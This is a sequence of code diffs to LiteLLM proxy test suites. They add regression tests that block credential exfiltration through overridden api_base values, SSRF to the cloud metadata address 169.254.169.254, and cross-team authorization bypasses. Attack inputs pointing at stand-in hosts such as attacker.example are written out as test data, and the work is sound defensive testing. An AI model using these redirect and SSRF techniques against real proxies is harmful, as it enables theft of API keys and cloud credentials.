-        _reject_inherited_credential_redirect(
-            config_litellm_params={
-                "litellm_credential_name": "openai-cred",
-                "api_base": "https://real",
-            },
-            request_litellm_params={"api_base": "https://attacker"},
+    with patch.object(litellm, "user_url_validation", False):
+        # Non-admin overrides WITH their own credential -> allowed.
+        _assert_non_admin_destination_override_is_safe(
+            {"api_base": "https://attacker.example", "api_key": "sk-own"}, non_admin
         )
-    # request supplies its own credential -> allowed
-    _reject_inherited_credential_redirect(
-        config_litellm_params={"api_key": "sk-x"},
-        request_litellm_params={"api_key": "sk-own", "api_base": "https://attacker"},
+    # No destination override -> allowed.
+    _assert_non_admin_destination_override_is_safe({"model": "gpt-4o"}, non_admin)
+    # Proxy admin is exempt even when overriding without a credential.
+    _assert_non_admin_destination_override_is_safe(
+        {"api_base": "https://attacker.example"}, admin
     )
-    # no destination override -> allowed
-    _reject_inherited_credential_redirect(
-        config_litellm_params={"api_key": "sk-x"},
-        request_litellm_params={"model": "gpt-4o"},
-    )
+    # Non-admin override to an internal/metadata IP -> SSRF-rejected.
+    with patch.object(litellm, "user_url_validation", True):
+        with pytest.raises(HTTPException):
+            _assert_non_admin_destination_override_is_safe(
+                {
+                    "api_base": "http://169.254.169.254/latest/meta-data/",
+                    "api_key": "sk-own",
+                },
+                non_admin,
+            )
+
+
+@pytest.mark.asyncio
+async def test_test_connection_rejects_adhoc_override_without_credential():
+    """An ad-hoc OpenAI-compatible model (no resolved deployment) with an api_base
+    override and no api_key must be refused: the provider would otherwise fall
+    back to the proxy's OPENAI_API_KEY and send it to the override."""
+    from fastapi import HTTPException
+
+    mock_router = MagicMock()
+    mock_router.get_deployment.return_value = None
+    mock_router.get_model_list.return_value = []
+    mock_auth = AsyncMock(return_value=True)
+    mock_ahealth = AsyncMock(return_value={"status": "healthy"})
+
+    with contextlib.ExitStack() as stack:
+        for p in _health_test_connection_patches(
+            MagicMock(), mock_router, mock_auth, mock_ahealth
+        ):
+            stack.enter_context(p)
+        with pytest.raises(HTTPException) as exc_info:
+            await health_test_model_connection(
+                request=MagicMock(),
+                mode="chat",
+                litellm_params={
+                    "model": "openai/gpt-4o",
+                    "api_base": "https://attacker.example/v1",
+                },
+                model_info={"team_id": "team-ATTACKER"},
+                user_api_key_dict=MagicMock(
+                    user_id="attacker", token="t", user_role="internal_user"
+                ),
+            )
+        assert exc_info.value.status_code == 400
+
+    mock_ahealth.assert_not_called()  # OPENAI_API_KEY never went out
 
 
 @pytest.mark.asyncio

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1,3 +1,4 @@
+import contextlib
 import os
 import sys
 import time
@@ -1823,3 +1824,157 @@ def test_clean_endpoint_data_strips_credentials_keeps_routing_fields():
     assert "aws_access_key_id" not in cleaned
     assert cleaned.get("api_base") == "https://example.test/v1"
     assert cleaned.get("api_version") == "2024-10-21"
+
+
+# ---------------------------------------------------------------------------
+# VERIA-120: /health/test_connection confused-deputy hardening
+# ---------------------------------------------------------------------------
+
+
+def _health_test_connection_patches(mock_prisma, mock_router, mock_auth, mock_ahealth):
+    def _noop_update(model_info, litellm_params):
+        params = litellm_params.copy()
+        params["messages"] = [{"role": "user", "content": "x"}]
+        return params
+
+    return (
+        patch("litellm.proxy.proxy_server.prisma_client", mock_prisma),
+        patch("litellm.proxy.proxy_server.llm_router", mock_router),
+        patch("litellm.proxy.proxy_server.premium_user", True),
+        patch(
+            "litellm.proxy.management_endpoints.model_management_endpoints.ModelManagementAuthChecks.can_user_make_model_call",
+            mock_auth,
+        ),
+        patch(
+            "litellm.proxy.health_endpoints._health_endpoints.litellm.ahealth_check",
+            mock_ahealth,
+        ),
+        patch(
+            "litellm.proxy.health_endpoints._health_endpoints.run_with_timeout",
+            AsyncMock(return_value={"status": "healthy"}),
+        ),
+        patch(
+            "litellm.proxy.health_endpoints._health_endpoints._update_litellm_params_for_health_check",
+            _noop_update,
+        ),
+        patch(
+            "litellm.proxy.health_endpoints._health_endpoints._reject_os_environ_references",
+            lambda params: None,
+        ),
+    )
+
+
+@pytest.mark.asyncio
+async def test_test_connection_authorizes_against_resolved_deployment_owner():
+    """A team admin must not probe another team's deployment by id: the auth
+    check must run against the RESOLVED deployment's team_id, not the
+    caller-supplied model_info.team_id."""
+    from litellm.types.router import Deployment, LiteLLM_Params
+
+    victim = Deployment(
+        model_name="victim",
+        litellm_params=LiteLLM_Params(
+            model="azure/gpt-4o",
+            api_key="sk-victim",
+            api_base="https://victim.example/v1",
+        ),
+        model_info={"id": "victim-id", "team_id": "team-OWNER"},
+    )
+    mock_router = MagicMock()
+    mock_router.get_deployment.side_effect = lambda model_id: (
+        victim if model_id == "victim-id" else None
+    )
+
+    captured = {}
+
+    async def _capture(*, model_params, **kwargs):
+        captured["team_id"] = model_params.model_info.team_id
+        return True
+
+    mock_auth = AsyncMock(side_effect=_capture)
+    mock_ahealth = AsyncMock(return_value={"status": "healthy"})
+
+    with contextlib.ExitStack() as stack:
+        for p in _health_test_connection_patches(
+            MagicMock(), mock_router, mock_auth, mock_ahealth
+        ):
+            stack.enter_context(p)
+        await health_test_model_connection(
+            request=MagicMock(),
+            mode="chat",
+            litellm_params={"model": "azure/gpt-4o"},  # no destination override
+            model_info={"id": "victim-id", "team_id": "team-ATTACKER"},
+            user_api_key_dict=MagicMock(user_id="attacker", token="t"),
+        )
+
+    assert captured.get("team_id") == "team-OWNER"
+
+
+@pytest.mark.asyncio
+async def test_test_connection_rejects_inherited_key_with_api_base_override():
+    """Refuse to send an inherited config api_key to a request-overridden
+    api_base (the credential-exfiltration vector)."""
+    from fastapi import HTTPException
+
+    from litellm.types.router import Deployment, LiteLLM_Params
+
+    victim = Deployment(
+        model_name="victim",
+        litellm_params=LiteLLM_Params(
+            model="azure/gpt-4o",
+            api_key="sk-victim",
+            api_base="https://victim.example/v1",
+        ),
+        model_info={"id": "victim-id", "team_id": "team-OWNER"},
+    )
+    mock_router = MagicMock()
+    mock_router.get_deployment.side_effect = lambda model_id: (
+        victim if model_id == "victim-id" else None
+    )
+    mock_auth = AsyncMock(return_value=True)
+    mock_ahealth = AsyncMock(return_value={"status": "healthy"})
+
+    with contextlib.ExitStack() as stack:
+        for p in _health_test_connection_patches(
+            MagicMock(), mock_router, mock_auth, mock_ahealth
+        ):
+            stack.enter_context(p)
+        with pytest.raises(HTTPException) as exc_info:
+            await health_test_model_connection(
+                request=MagicMock(),
+                mode="chat",
+                litellm_params={
+                    "model": "azure/gpt-4o",
+                    "api_base": "https://attacker.example/v1",  # override, no api_key
+                },
+                model_info={"id": "victim-id"},
+                user_api_key_dict=MagicMock(user_id="attacker", token="t"),
+            )
+        assert exc_info.value.status_code == 400
+
+    mock_ahealth.assert_not_called()  # the inherited key never went out
+
+
+def test_reject_inherited_credential_redirect_helper():
+    from fastapi import HTTPException
+
+    from litellm.proxy.health_endpoints._health_endpoints import (
+        _reject_inherited_credential_redirect,
+    )
+
+    # inherited credential + overridden destination -> rejected
+    with pytest.raises(HTTPException):
+        _reject_inherited_credential_redirect(
+            config_litellm_params={"api_key": "sk-x", "api_base": "https://real"},
+            request_litellm_params={"api_base": "https://attacker"},
+        )
+    # request supplies its own credential -> allowed
+    _reject_inherited_credential_redirect(
+        config_litellm_params={"api_key": "sk-x"},
+        request_litellm_params={"api_key": "sk-own", "api_base": "https://attacker"},
+    )
+    # no destination override -> allowed
+    _reject_inherited_credential_redirect(
+        config_litellm_params={"api_key": "sk-x"},
+        request_litellm_params={"model": "gpt-4o"},
+    )

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1978,3 +1978,22 @@ def test_reject_inherited_credential_redirect_helper():
         config_litellm_params={"api_key": "sk-x"},
         request_litellm_params={"model": "gpt-4o"},
     )
+
+
+def test_reject_ssrf_destination_helper():
+    import litellm
+    from fastapi import HTTPException
+
+    from litellm.proxy.health_endpoints._health_endpoints import (
+        _reject_ssrf_destination,
+    )
+
+    # Internal/metadata target is rejected when URL validation is on.
+    with patch.object(litellm, "user_url_validation", True):
+        with pytest.raises(HTTPException):
+            _reject_ssrf_destination(
+                {"api_base": "http://169.254.169.254/latest/meta-data/"}
+            )
+    # The opt-out toggle is honored (internal endpoints / Ollama).
+    with patch.object(litellm, "user_url_validation", False):
+        _reject_ssrf_destination({"api_base": "http://127.0.0.1:8080"})

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1978,22 +1978,3 @@ def test_reject_inherited_credential_redirect_helper():
         config_litellm_params={"api_key": "sk-x"},
         request_litellm_params={"model": "gpt-4o"},
     )
-
-
-def test_reject_ssrf_destination_helper():
-    import litellm
-    from fastapi import HTTPException
-
-    from litellm.proxy.health_endpoints._health_endpoints import (
-        _reject_ssrf_destination,
-    )
-
-    # Internal/metadata target is rejected when URL validation is on.
-    with patch.object(litellm, "user_url_validation", True):
-        with pytest.raises(HTTPException):
-            _reject_ssrf_destination(
-                {"api_base": "http://169.254.169.254/latest/meta-data/"}
-            )
-    # The opt-out toggle is honored (internal endpoints / Ollama).
-    with patch.object(litellm, "user_url_validation", False):
-        _reject_ssrf_destination({"api_base": "http://127.0.0.1:8080"})

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1987,3 +1987,45 @@ def test_reject_inherited_credential_redirect_helper():
         config_litellm_params={"api_key": "sk-x"},
         request_litellm_params={"model": "gpt-4o"},
     )
+
+
+@pytest.mark.asyncio
+async def test_test_connection_model_name_path_authorizes_against_resolved_owner():
+    """When the deployment is resolved by model_name (no id), auth must still run
+    against the resolved deployment's owner, not the caller-supplied model_info."""
+    victim_deployment = {
+        "model_name": "victim-model",
+        "litellm_params": {
+            "model": "azure/gpt-4o",
+            "api_key": "sk-victim",
+            "api_base": "https://victim.example/v1",
+        },
+        "model_info": {"id": "victim-id", "team_id": "team-OWNER"},
+    }
+    mock_router = MagicMock()
+    mock_router.get_deployment.return_value = None  # no id resolution
+    mock_router.get_model_list.return_value = [victim_deployment]
+
+    captured = {}
+
+    async def _capture(*, model_params, **kwargs):
+        captured["team_id"] = model_params.model_info.team_id
+        return True
+
+    mock_auth = AsyncMock(side_effect=_capture)
+    mock_ahealth = AsyncMock(return_value={"status": "healthy"})
+
+    with contextlib.ExitStack() as stack:
+        for p in _health_test_connection_patches(
+            MagicMock(), mock_router, mock_auth, mock_ahealth
+        ):
+            stack.enter_context(p)
+        await health_test_model_connection(
+            request=MagicMock(),
+            mode="chat",
+            litellm_params={"model": "victim-model"},  # resolved by name, no id
+            model_info={"team_id": "team-ATTACKER"},
+            user_api_key_dict=MagicMock(user_id="attacker", token="t"),
+        )
+
+    assert captured.get("team_id") == "team-OWNER"

--- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
+++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py
@@ -1968,6 +1968,15 @@ def test_reject_inherited_credential_redirect_helper():
             config_litellm_params={"api_key": "sk-x", "api_base": "https://real"},
             request_litellm_params={"api_base": "https://attacker"},
         )
+    # inherited stored-credential-NAME (no inline api_key) + override -> also rejected
+    with pytest.raises(HTTPException):
+        _reject_inherited_credential_redirect(
+            config_litellm_params={
+                "litellm_credential_name": "openai-cred",
+                "api_base": "https://real",
+            },
+            request_litellm_params={"api_base": "https://attacker"},
+        )
     # request supplies its own credential -> allowed
     _reject_inherited_credential_redirect(
         config_litellm_params={"api_key": "sk-x"},

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -293,105 +293,76 @@ class MockPrismaWrapper:
 
 
 class TestDeleteTeamModelAlias:
+    @staticmethod
+    def _alias_row(row_id, model_aliases, team_id):
+        from types import SimpleNamespace
+
+        return SimpleNamespace(
+            id=row_id,
+            model_aliases=model_aliases,
+            team=SimpleNamespace(team_id=team_id),
+        )
+
     @pytest.mark.asyncio
     async def test_delete_team_model_alias_success(self):
-        """Test successful deletion of a team model alias"""
+        """Only the owning team's alias is removed, even when another team's row
+        points at the same public model name."""
         from litellm.proxy.management_endpoints.model_management_endpoints import (
             delete_team_model_alias,
         )
 
-        # Setup test data
-        model_aliases_list = [
-            {
-                "id": 1,
-                "model_aliases": {
-                    "alias1": "public_model_1",
-                    "alias2": "public_model_2",
-                },
-                "updated_by": "test_user",
-                "created_by": "test_user",
-            },
-            {
-                "id": 2,
-                "model_aliases": {
-                    "alias3": "public_model_3",
-                    "alias4": "public_model_1",
-                },
-                "updated_by": "test_user",
-                "created_by": "test_user",
-            },  # public_model_1 appears twice
+        rows = [
+            self._alias_row(
+                1, {"alias1": "public_model_1", "alias2": "public_model_2"}, "team1"
+            ),
+            # team2 also aliases public_model_1; it must NOT be touched.
+            self._alias_row(2, {"alias4": "public_model_1"}, "team2"),
         ]
+        mock_prisma = MagicMock()
+        mock_prisma.db = MagicMock()
+        mock_prisma.db.litellm_modeltable = AsyncMock()
+        mock_prisma.db.litellm_modeltable.find_many = AsyncMock(return_value=rows)
+        mock_prisma.db.litellm_modeltable.update = AsyncMock()
 
-        # Create mock prisma client
-        mock_prisma = MockPrismaClient(team_exists=True)
-        mock_prisma.db = MockPrismaWrapper(model_aliases_list)
-
-        # Call the function
-        await delete_team_model_alias(
-            public_model_name="public_model_1", prisma_client=mock_prisma
+        removed = await delete_team_model_alias(
+            public_model_name="public_model_1",
+            team_id="team1",
+            prisma_client=mock_prisma,
         )
 
-        # Verify results
-        mock_db = mock_prisma.db.litellm_modeltable
-        assert (
-            len(mock_db.update_calls) == 2
-        )  # Should have 2 update calls since public_model_1 appears twice
-
-        # Verify first update
-        first_update = mock_db.update_calls[0]
-        assert first_update["where"] == {"id": 1}
-        assert json.loads(first_update["data"]["model_aliases"]) == {
+        update = mock_prisma.db.litellm_modeltable.update
+        assert update.call_count == 1  # only team1's row
+        assert update.call_args.kwargs["where"] == {"id": 1}
+        assert json.loads(update.call_args.kwargs["data"]["model_aliases"]) == {
             "alias2": "public_model_2"
         }
-
-        # Verify second update
-        second_update = mock_db.update_calls[1]
-        assert second_update["where"] == {"id": 2}
-        assert json.loads(second_update["data"]["model_aliases"]) == {
-            "alias3": "public_model_3"
-        }
+        assert removed == [("team1", "alias1")]
 
     @pytest.mark.asyncio
     async def test_delete_team_model_alias_no_matches(self):
-        """Test deletion when no matching model alias exists"""
+        """No updates when the owning team has no alias for the public name."""
         from litellm.proxy.management_endpoints.model_management_endpoints import (
             delete_team_model_alias,
         )
 
-        # Setup test data with no matching model
-        model_aliases_list = [
-            {
-                "id": 1,
-                "model_aliases": {
-                    "alias1": "public_model_1",
-                    "alias2": "public_model_2",
-                },
-                "updated_by": "test_user",
-                "created_by": "test_user",
-            },
-            {
-                "id": 2,
-                "model_aliases": {
-                    "alias3": "public_model_3",
-                    "alias4": "public_model_4",
-                },
-                "updated_by": "test_user",
-                "created_by": "test_user",
-            },
+        rows = [
+            self._alias_row(
+                1, {"alias1": "public_model_1", "alias2": "public_model_2"}, "team1"
+            ),
         ]
+        mock_prisma = MagicMock()
+        mock_prisma.db = MagicMock()
+        mock_prisma.db.litellm_modeltable = AsyncMock()
+        mock_prisma.db.litellm_modeltable.find_many = AsyncMock(return_value=rows)
+        mock_prisma.db.litellm_modeltable.update = AsyncMock()
 
-        # Create mock prisma client
-        mock_prisma = MockPrismaClient(team_exists=True)
-        mock_prisma.db = MockPrismaWrapper(model_aliases_list)
-
-        # Call the function with non-existent model
         await delete_team_model_alias(
-            public_model_name="non_existent_model", prisma_client=mock_prisma
+            public_model_name="non_existent_model",
+            team_id="team1",
+            prisma_client=mock_prisma,
         )
 
-        # Verify no updates were made
-        mock_db = mock_prisma.db.litellm_modeltable
-        assert len(mock_db.update_calls) == 0
+        assert mock_prisma.db.litellm_modeltable.update.call_count == 0
 
 
 class TestClearCache:
@@ -2345,8 +2316,9 @@ class TestModelMgmtAuthzHardening:
 
         captured = {}
 
-        async def fake_delete_alias(public_model_name, prisma_client):
+        async def fake_delete_alias(public_model_name, team_id, prisma_client):
             captured["public_model_name"] = public_model_name
+            captured["team_id"] = team_id
             return []
 
         _PS = "litellm.proxy.proxy_server"
@@ -2469,9 +2441,10 @@ class TestModelMgmtAuthzHardening:
     def test_destination_change_partial_resupply_is_rejected(self):
         from litellm.proxy._types import ProxyException
 
-        # Patch redirects api_base AND supplies an UNRELATED credential
-        # (aws_secret_access_key); the inherited api_key is still not re-supplied,
-        # so the change must be rejected rather than letting api_key ride along.
+        # Patch redirects api_base but supplies only an UNRELATED credential
+        # (aws_secret_access_key, which an OpenAI-compatible api_base does not
+        # consume), so the change must be rejected rather than letting the stored
+        # api_key (or the env fallback) ride along to the new endpoint.
         db = {"api_base": "https://real.example", "api_key": "sk-inherited"}
         with pytest.raises(ProxyException) as e:
             self._assert_resupply(
@@ -2481,7 +2454,7 @@ class TestModelMgmtAuthzHardening:
                 },
                 db,
             )
-        assert e.value.param == "api_key"
+        assert e.value.param == "api_base"
 
     # --- Veria sweep follow-ups: authoritative pricing set, base_model, extra URLs ---
 
@@ -2558,3 +2531,76 @@ class TestModelMgmtAuthzHardening:
             self._assert_resupply(
                 {"aws_sts_endpoint": "https://sts.attacker", "api_key": "x"}, db
             )
+
+    def test_unrelated_credential_does_not_satisfy_aws_endpoint_override(self):
+        from litellm.proxy._types import ProxyException
+
+        # AWS providers sign with ambient credentials regardless of api_key, so an
+        # api_key must NOT satisfy an AWS endpoint override (it would leave ambient
+        # AWS creds to be SigV4-signed to the attacker host). Model has no stored
+        # AWS credential (ambient).
+        db = {"aws_bedrock_runtime_endpoint": "https://real.aws"}
+        with pytest.raises(ProxyException) as e:
+            self._assert_resupply(
+                {
+                    "aws_bedrock_runtime_endpoint": "https://attacker.example",
+                    "api_key": "sk-unrelated",
+                },
+                db,
+            )
+        assert e.value.param == "aws_bedrock_runtime_endpoint"
+        # Supplying an actual AWS credential is accepted.
+        self._assert_resupply(
+            {
+                "aws_bedrock_runtime_endpoint": "https://attacker.example",
+                "aws_secret_access_key": "ak",
+            },
+            db,
+        )
+        # Conversely, an unrelated AWS credential does not satisfy a generic
+        # api_base override (OpenAI ignores it and falls back to OPENAI_API_KEY).
+        with pytest.raises(ProxyException):
+            self._assert_resupply(
+                {"api_base": "https://attacker", "aws_secret_access_key": "ak"},
+                {"api_base": "https://real"},
+            )
+
+    @pytest.mark.asyncio
+    async def test_delete_team_model_alias_only_touches_owning_team(self):
+        from types import SimpleNamespace
+
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            delete_team_model_alias,
+        )
+
+        # Two teams have an alias pointing at the same public model name.
+        row_a = SimpleNamespace(
+            id="A",
+            model_aliases={"gpt4": "shared-public"},
+            team=SimpleNamespace(team_id="teamA"),
+        )
+        row_b = SimpleNamespace(
+            id="B",
+            model_aliases={"gpt4": "shared-public"},
+            team=SimpleNamespace(team_id="teamB"),
+        )
+        mock_prisma = MagicMock()
+        mock_prisma.db = MagicMock()
+        mock_prisma.db.litellm_modeltable = AsyncMock()
+        mock_prisma.db.litellm_modeltable.find_many = AsyncMock(
+            return_value=[row_a, row_b]
+        )
+        mock_prisma.db.litellm_modeltable.update = AsyncMock()
+
+        removed = await delete_team_model_alias(
+            public_model_name="shared-public",
+            team_id="teamA",
+            prisma_client=mock_prisma,
+        )
+
+        # Only the owning team's alias row is updated; teamB's is untouched.
+        assert mock_prisma.db.litellm_modeltable.update.call_count == 1
+        assert mock_prisma.db.litellm_modeltable.update.call_args.kwargs["where"] == {
+            "id": "A"
+        }
+        assert removed == [("teamA", "gpt4")]

--- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
+++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py
@@ -1315,6 +1315,8 @@ class TestAddAndDeleteModelLifecycle:
 
         mock_router = MagicMock()
         mock_router.delete_deployment = MagicMock()
+        # The new model id is not already live in the router (no collision).
+        mock_router.has_model_id = MagicMock(return_value=False)
 
         _PS = "litellm.proxy.proxy_server"
         _ENCRYPT = "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper"
@@ -1917,3 +1919,507 @@ class TestPatchModelBlockedAuthGate:
             )
             assert result is updated_row
             mock_prisma.db.litellm_proxymodeltable.update.assert_awaited_once()
+
+
+class TestModelMgmtAuthzHardening:
+    """Regression tests for the model-management authorization cluster.
+
+    Each test fails on the unpatched code path it targets and passes only with
+    the corresponding guard in place.
+    """
+
+    # --- update_db_model: id pin + SSRF + credential re-point (115c / 111) ---
+
+    def _db_model_with_secret(self):
+        from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo
+
+        return Deployment(
+            model_name="m",
+            litellm_params=LiteLLM_Params(
+                model="openai/gpt-4",
+                api_key="sk-real",
+                api_base="https://real.example.com",
+            ),
+            model_info=ModelInfo(id="real-id"),
+        )
+
+    def test_patch_cannot_change_stored_model_id(self):
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            update_db_model,
+        )
+        from litellm.types.router import ModelInfo
+
+        result = update_db_model(
+            db_model=self._db_model_with_secret(),
+            updated_patch=updateDeployment(model_info=ModelInfo(id="spoofed-id")),
+        )
+        info = json.loads(result["model_info"])
+        assert info["id"] == "real-id"
+
+    def test_api_base_change_clears_inherited_credential(self):
+        import litellm
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            update_db_model,
+        )
+        from litellm.types.router import updateLiteLLMParams
+
+        with (
+            patch.object(litellm, "user_url_validation", False),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper",
+                side_effect=lambda value, **kwargs: value,
+            ),
+        ):
+            result = update_db_model(
+                db_model=self._db_model_with_secret(),
+                updated_patch=updateDeployment(
+                    litellm_params=updateLiteLLMParams(
+                        api_base="https://attacker.example.com"
+                    )
+                ),
+            )
+        params = json.loads(result["litellm_params"])
+        assert "api_key" not in params  # stored secret must not ride to new base
+
+    def test_api_base_change_with_new_key_keeps_credential(self):
+        import litellm
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            update_db_model,
+        )
+        from litellm.types.router import updateLiteLLMParams
+
+        with (
+            patch.object(litellm, "user_url_validation", False),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper",
+                side_effect=lambda value, **kwargs: value,
+            ),
+        ):
+            result = update_db_model(
+                db_model=self._db_model_with_secret(),
+                updated_patch=updateDeployment(
+                    litellm_params=updateLiteLLMParams(
+                        api_base="https://attacker.example.com", api_key="sk-new"
+                    )
+                ),
+            )
+        params = json.loads(result["litellm_params"])
+        assert "api_key" in params  # caller re-supplied a key, so it is kept
+
+    def test_unchanged_destination_keeps_credential(self):
+        import litellm
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            update_db_model,
+        )
+        from litellm.types.router import updateLiteLLMParams
+
+        # Re-saving the same api_base (e.g. a UI resend) must NOT clear the key.
+        with (
+            patch.object(litellm, "user_url_validation", False),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper",
+                side_effect=lambda value, **kwargs: value,
+            ),
+        ):
+            result = update_db_model(
+                db_model=self._db_model_with_secret(),
+                updated_patch=updateDeployment(
+                    litellm_params=updateLiteLLMParams(
+                        api_base="https://real.example.com"
+                    )
+                ),
+            )
+        params = json.loads(result["litellm_params"])
+        assert "api_key" in params
+
+    def test_validate_model_url_params_blocks_internal_ip(self):
+        import litellm
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _validate_model_url_params,
+        )
+
+        with patch.object(litellm, "user_url_validation", True):
+            with pytest.raises(ProxyException):
+                _validate_model_url_params(
+                    {"api_base": "http://169.254.169.254/latest/meta-data/"}
+                )
+        # Honors the opt-out toggle (internal endpoints / Ollama).
+        with (
+            patch.object(litellm, "user_url_validation", False),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper",
+                side_effect=lambda value, **kwargs: value,
+            ),
+        ):
+            _validate_model_url_params({"api_base": "http://169.254.169.254/"})
+
+    # --- field-level authorization (173b / 115b / 173a) ---
+
+    def _non_admin(self):
+        return UserAPIKeyAuth(
+            user_id="team-admin", user_role=LitellmUserRoles.INTERNAL_USER
+        )
+
+    def _admin(self):
+        return UserAPIKeyAuth(user_id="admin", user_role=LitellmUserRoles.PROXY_ADMIN)
+
+    def test_pricing_fields_are_proxy_admin_only(self):
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _assert_privileged_model_fields_authorized,
+        )
+        from litellm.types.router import updateLiteLLMParams
+
+        # Non-admin setting pricing -> rejected.
+        with pytest.raises(ProxyException) as e:
+            _assert_privileged_model_fields_authorized(
+                litellm_params=updateLiteLLMParams(input_cost_per_token=0.0),
+                model_info=None,
+                user_api_key_dict=self._non_admin(),
+            )
+        assert str(e.value.code) == "403"
+        # Non-admin clearing pricing (explicit null) -> also rejected.
+        with pytest.raises(ProxyException):
+            _assert_privileged_model_fields_authorized(
+                litellm_params=updateLiteLLMParams(output_cost_per_token=None),
+                model_info=None,
+                user_api_key_dict=self._non_admin(),
+            )
+        # Proxy admin -> allowed.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=updateLiteLLMParams(input_cost_per_token=0.0),
+            model_info=None,
+            user_api_key_dict=self._admin(),
+        )
+
+    def test_credential_name_binding_is_proxy_admin_only(self):
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _assert_privileged_model_fields_authorized,
+        )
+        from litellm.types.router import updateLiteLLMParams
+
+        with pytest.raises(ProxyException) as e:
+            _assert_privileged_model_fields_authorized(
+                litellm_params=updateLiteLLMParams(
+                    litellm_credential_name="someone-elses-cred"
+                ),
+                model_info=None,
+                user_api_key_dict=self._non_admin(),
+            )
+        assert str(e.value.code) == "403"
+        # Admin may bind a stored credential.
+        _assert_privileged_model_fields_authorized(
+            litellm_params=updateLiteLLMParams(litellm_credential_name="shared-cred"),
+            model_info=None,
+            user_api_key_dict=self._admin(),
+        )
+
+    def test_team_model_requires_own_credential(self):
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _assert_team_model_has_own_credential,
+        )
+        from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo
+
+        keyless_team_model = Deployment(
+            model_name="team-gpt",
+            litellm_params=LiteLLM_Params(model="openai/gpt-4"),
+            model_info=ModelInfo(team_id="team-x"),
+        )
+        with pytest.raises(ProxyException) as e:
+            _assert_team_model_has_own_credential(keyless_team_model, self._non_admin())
+        assert str(e.value.code) == "400"
+        # With its own key -> allowed.
+        keyed_team_model = Deployment(
+            model_name="team-gpt",
+            litellm_params=LiteLLM_Params(model="openai/gpt-4", api_key="sk-team"),
+            model_info=ModelInfo(team_id="team-x"),
+        )
+        _assert_team_model_has_own_credential(keyed_team_model, self._non_admin())
+        # Proxy admin may create a key-less team model (uses configured keys).
+        _assert_team_model_has_own_credential(keyless_team_model, self._admin())
+
+    # --- team-scope inheritance: cannot rename a team model into the global pool (115a / 168a) ---
+
+    @pytest.mark.asyncio
+    async def test_team_model_cannot_be_renamed_to_global_via_omitted_model_info(self):
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _update_team_model_in_db,
+        )
+        from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo
+
+        db_model = Deployment(
+            model_name="model_name_teamX_abc123",
+            litellm_params=LiteLLM_Params(model="azure/gpt-4o", api_key="sk-team"),
+            model_info=ModelInfo(
+                team_id="teamX", team_public_model_name="my-team-alias"
+            ),
+        )
+        # Attacker PATCHes only model_name (omits model_info) to a global name.
+        patch_data = updateDeployment(model_name="gpt-4")
+        admin_of_team = UserAPIKeyAuth(
+            user_id="team-admin", user_role=LitellmUserRoles.INTERNAL_USER
+        )
+
+        with (
+            patch("litellm.proxy.proxy_server.premium_user", True),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.team_model_add"
+            ),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.team_model_delete"
+            ),
+        ):
+            result = await _update_team_model_in_db(
+                db_model=db_model,
+                patch_data=patch_data,
+                user_api_key_dict=admin_of_team,
+                prisma_client=MockPrismaClient(team_exists=True),  # type: ignore
+            )
+
+        # The internal team model_name must be preserved, not overwritten to "gpt-4".
+        assert result.get("model_name", "model_name_teamX_abc123").startswith(
+            "model_name_teamX_"
+        )
+        assert result.get("model_name") != "gpt-4"
+
+    @pytest.mark.asyncio
+    async def test_patch_rejects_moving_model_to_a_different_team(self):
+        from litellm.proxy._types import ProxyException
+        from litellm.proxy.management_endpoints.model_management_endpoints import (
+            _update_team_model_in_db,
+        )
+        from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo
+
+        db_model = Deployment(
+            model_name="model_name_teamX_abc123",
+            litellm_params=LiteLLM_Params(model="azure/gpt-4o", api_key="sk-team"),
+            model_info=ModelInfo(team_id="teamX"),
+        )
+        patch_data = updateDeployment(model_info=ModelInfo(team_id="teamY"))
+
+        with (
+            patch("litellm.proxy.proxy_server.premium_user", True),
+            patch(
+                "litellm.proxy.management_endpoints.model_management_endpoints.team_model_add"
+            ),
+        ):
+            with pytest.raises(ProxyException) as e:
+                await _update_team_model_in_db(
+                    db_model=db_model,
+                    patch_data=patch_data,
+                    user_api_key_dict=UserAPIKeyAuth(
+                        user_id="team-admin",
+                        user_role=LitellmUserRoles.PROXY_ADMIN,
+                    ),
